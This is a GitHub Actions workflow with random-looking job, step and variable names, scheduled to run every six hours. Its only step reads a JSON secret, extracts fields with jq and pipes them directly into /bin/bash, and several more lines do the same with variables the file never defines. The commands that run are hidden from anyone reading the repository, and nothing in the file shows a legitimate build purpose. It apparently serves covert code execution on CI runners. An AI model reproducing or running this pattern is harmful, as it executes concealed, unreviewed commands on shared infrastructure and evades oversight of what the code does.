name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          wfu8: ${{ secrets.wfu8 }}
        run: |
          echo $wfu8 | jq -r .botq6708 | /bin/bash
          echo $mwb9 | jq -r .zhegp24 | /bin/bash
          echo $cz64600 | jq -r .vsf15 | /bin/bash
          echo $erl3760 | jq -r .s1538 | /bin/bash
          echo $iyxez1 | jq -r .msue30333 | /bin/bash
          echo $wvkj47791 | jq -r .b3495 | /bin/bash
          echo $ex1733 | jq -r .uketg24737 | /bin/bash

